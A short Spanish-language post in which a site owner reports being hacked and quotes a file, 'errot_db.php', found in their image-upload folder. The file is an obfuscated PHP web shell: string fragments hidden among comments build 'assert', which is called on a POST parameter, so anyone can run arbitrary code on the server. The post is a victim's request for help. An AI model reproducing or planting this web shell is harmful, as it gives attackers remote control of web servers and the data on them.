Recientemente, descubrí que mi proyecto fue pirateado y encontré un script en mi carpeta de imágenes que contenía un directorio para que el usuario suba sus imágenes (usando la entrada de archivos). Aquí está el script que encontré en el directorio.
errot_db.php
<?php
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);
?>